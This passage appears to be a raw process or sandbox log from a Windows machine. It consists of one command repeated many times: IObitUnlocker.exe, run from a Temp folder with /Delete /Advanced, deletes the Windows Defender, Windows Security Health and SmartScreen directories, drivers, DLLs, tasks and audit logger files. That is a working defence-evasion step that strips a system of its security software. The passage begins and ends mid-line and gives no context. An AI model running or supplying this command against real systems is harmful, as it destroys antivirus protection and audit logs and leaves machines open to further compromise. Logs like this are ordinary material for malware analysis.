ysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Wind
ows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 